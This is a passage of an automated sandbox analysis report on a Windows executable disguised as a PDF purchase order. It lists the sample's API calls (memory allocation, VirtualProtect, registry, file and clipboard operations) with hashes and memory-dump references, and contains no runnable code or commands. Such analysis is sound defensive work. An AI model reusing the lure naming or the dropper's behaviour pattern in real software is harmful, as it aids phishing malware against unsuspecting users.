                                                                                                                                    • Instruction Fuzzy Hash: 71D09E71654601AFEF098F20DE16F2E7AA2FB84B00F11562CB682940E0DAB158199B15
                                                                                                                                    APIs
                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,00403293,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405706
                                                                                                                                    • GetLastError.KERNEL32 ref: 00405714
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1375471231-0
                                                                                                                                    • Opcode ID: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                                                                                                    • Instruction ID: 3f205c5890689a668e8791f8cf6ed098ce3dcc56284ebb1818e0a19aeae2b5ff
                                                                                                                                    • Opcode Fuzzy Hash: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                                                                                                    • Instruction Fuzzy Hash: DBC04C30225602DADA106F34DE087177951AB90741F1184396146E61A0DA348415E93D
                                                                                                                                    APIs
                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000), ref: 10002963
                                                                                                                                    • GetLastError.KERNEL32 ref: 10002A6A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2206700289.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2206687623.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2206712677.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2206725097.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_10000000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocErrorLastVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 497505419-0
                                                                                                                                    • Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                                                                    • Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
                                                                                                                                    • Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                                                                    • Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
                                                                                                                                    APIs
                                                                                                                                    • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004027A0
                                                                                                                                      • Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FilePointerwsprintf
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 327478801-0
                                                                                                                                    • Opcode ID: 625ba8c0adf551b09f916d27f71fdaae1f0ecd84ce04db3249cbe24fae782c82
                                                                                                                                    • Instruction ID: c5c3fa32fc6d0159c61c67e46e8878479b4609e7a69e49ca0ebb3ecbbe822ed2
                                                                                                                                    • Opcode Fuzzy Hash: 625ba8c0adf551b09f916d27f71fdaae1f0ecd84ce04db3249cbe24fae782c82
                                                                                                                                    • Instruction Fuzzy Hash: A0E04F71702514EFDB01AFA59E4ACAFBB6AEB40328B14443BF501F00E1DA7D8C019A2D
                                                                                                                                    APIs
                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: PrivateProfileStringWrite
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 390214022-0
                                                                                                                                    • Opcode ID: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
                                                                                                                                    • Instruction ID: 9c0f32427e9d9ad9a827debec1b0d32512713181f08a0e22f3c826aa7fb996c6
                                                                                                                                    • Opcode Fuzzy Hash: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
                                                                                                                                    • Instruction Fuzzy Hash: 90E04F319001246ADB113EF10E8ED7F31695B40314B1405BFB551B66C6D9FC0D4246A9
                                                                                                                                    APIs
                                                                                                                                    • RegOpenKeyExW.KERNELBASE(00000000,00000495,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Open
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 71445658-0
                                                                                                                                    • Opcode ID: e61a0d233959cf951fd8dee32620159f1f5f2b0e63671ee31e14641033e06cac
                                                                                                                                    • Instruction ID: 180cb462b76767e938a43b2c67eaf1f9418a6812eb156052446fd1a81c43fca4
                                                                                                                                    • Opcode Fuzzy Hash: e61a0d233959cf951fd8dee32620159f1f5f2b0e63671ee31e14641033e06cac
                                                                                                                                    • Instruction Fuzzy Hash: 54E0BF76154108AFDB00DFA5EE46EA977ECAB44704F044025BA09E7191C674E5509768
                                                                                                                                    APIs
                                                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040320B,00000000,00416A20,000000FF,00416A20,000000FF,000000FF,00000004,00000000), ref: 00405CF0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileWrite
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                    • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                                                                    • Instruction ID: d2761c75b63c3b5a1b4cb2cfb4b6a55fbed1fd27b7f8bdfe76624f6b99830631
                                                                                                                                    • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                                                                    • Instruction Fuzzy Hash: 2AE0EC3221425AABDF109E55EC08FEB7B6CEF05360F049437FA55E7190D631E921DBA4
                                                                                                                                    APIs
                                                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403255,00000000,00000000,00403079,000000FF,00000004,00000000,00000000,00000000), ref: 00405CC1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileRead
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                    • Opcode ID: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                                                                                                    • Instruction ID: 881bd9ca443264ea0180802fa9c86a3c9bfb0e6b132b989af4612487e9445b73
                                                                                                                                    • Opcode Fuzzy Hash: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                                                                                                    • Instruction Fuzzy Hash: D1E08632104259ABDF105E518C00AEB376CFB04361F104432F911E3140D630E8119FB4
                                                                                                                                    APIs
                                                                                                                                    • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2206700289.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2206687623.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2206712677.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2206725097.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_10000000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                    • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                                    • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                                                                                                                    • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                                    • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
                                                                                                                                    APIs
                                                                                                                                    • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AttributesFile
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                    • Opcode ID: 9f81f92dad3f7a811467f01a8cf18fc77b7af2f5e37f886534bc513ef1489464
                                                                                                                                    • Instruction ID: 4fb9e9dd77d4d4fa14caa6284e3e33111a790732df8c0ecbc47c365062d5febc
                                                                                                                                    • Opcode Fuzzy Hash: 9f81f92dad3f7a811467f01a8cf18fc77b7af2f5e37f886534bc513ef1489464
                                                                                                                                    • Instruction Fuzzy Hash: 4BD05E33B04100DBCB10DFE8AE08ADD77B5AB80338B248177E601F21E4D6B8C650AB1D
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(00000028,?,?,00403F7A), ref: 0040415C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                    • Opcode ID: 3e4e113e80d15ce5a74be4961f661226ffae6a612218aa542e548efe3475e5a4
                                                                                                                                    • Instruction ID: f9280d834dafdcf82d79e279d22eccff0cbc279b2038abc2a2984d0c0ecbec1f
                                                                                                                                    • Opcode Fuzzy Hash: 3e4e113e80d15ce5a74be4961f661226ffae6a612218aa542e548efe3475e5a4
                                                                                                                                    • Instruction Fuzzy Hash: E3B01235180A00BBDE114B00EE09F857E62F7EC701F018438B340240F0CBB200A0DB08
                                                                                                                                    APIs
                                                                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,00000000,0040353A,?), ref: 00403266
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FilePointer
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                    • Opcode ID: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                                                                                    • Instruction ID: 2811e774c662cae59278f25d6ecae3b2a92cb5be3fe339fd2c15133e28e6e099
                                                                                                                                    • Opcode Fuzzy Hash: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                                                                                    • Instruction Fuzzy Hash: D0B01231140300BFDA214F00DF09F057B21AB90700F10C034B344380F086711035EB4D
                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,00000403), ref: 00405351
                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00405360
                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040539D
                                                                                                                                    • GetSystemMetrics.USER32(00000002), ref: 004053A4
                                                                                                                                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C5
                                                                                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D6
                                                                                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E9
                                                                                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F7
                                                                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040540A
                                                                                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040542C
                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405440
                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405461
                                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405471
                                                                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040548A
                                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405496
                                                                                                                                    • GetDlgItem.USER32(?,000003F8), ref: 0040536F
                                                                                                                                      • Part of subcall function 0040414E: SendMessageW.USER32(00000028,?,?,00403F7A), ref: 0040415C
                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004054B3
                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00005287,00000000), ref: 004054C1
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004054C8
                                                                                                                                    • ShowWindow.USER32(00000000), ref: 004054EC
                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 004054F1
                                                                                                                                    • ShowWindow.USER32(00000008), ref: 0040553B
                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556F
                                                                                                                                    • CreatePopupMenu.USER32 ref: 00405580
                                                                                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405594
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004055B4
                                                                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055CD
                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405605
                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 00405615
                                                                                                                                    • EmptyClipboard.USER32 ref: 0040561B
                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405627
                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00405631
                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405665
                                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00405670
                                                                                                                                    • CloseClipboard.USER32 ref: 00405676
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                    • String ID: {
                                                                                                                                    • API String ID: 590372296-366298937
                                                                                                                                    • Opcode ID: 6a0fc3a2d5fa7d70d7ffe9782798eb57218c845f869a5f65bcd99de69d398bf2
                                                                                                                                    • Instruction ID: bedd14c977596f777f0676ed5d78e17ab23f6a1f4e688fc8743dda88f8352f2f
                                                                                                                                    • Opcode Fuzzy Hash: 6a0fc3a2d5fa7d70d7ffe9782798eb57218c845f869a5f65bcd99de69d398bf2
                                                                                                                                    • Instruction Fuzzy Hash: 85B15A71900608FFDB11AF60DD89AAE7B79FB48355F00803AFA41BA1A0CB755E51DF58
                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404603
                                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 0040462D
                                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 004046DE
                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 004046E9
                                                                                                                                    • lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,?), ref: 0040471B
                                                                                                                                    • lstrcatW.KERNEL32(?,Call), ref: 00404727
                                                                                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404739
                                                                                                                                      • Part of subcall function 0040577E: GetDlgItemTextW.USER32(?,?,00000400,00404770), ref: 00405791
                                                                                                                                      • Part of subcall function 004062E9: CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 0040634C
                                                                                                                                      • Part of subcall function 004062E9: CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                                                      • Part of subcall function 004062E9: CharNextW.USER32(0040A300,"C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406360
                                                                                                                                      • Part of subcall function 004062E9: CharPrevW.USER32(0040A300,0040A300,75923420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406373
                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,?,0042B238,?,?,000003FB,?), ref: 004047FC
                                                                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404817
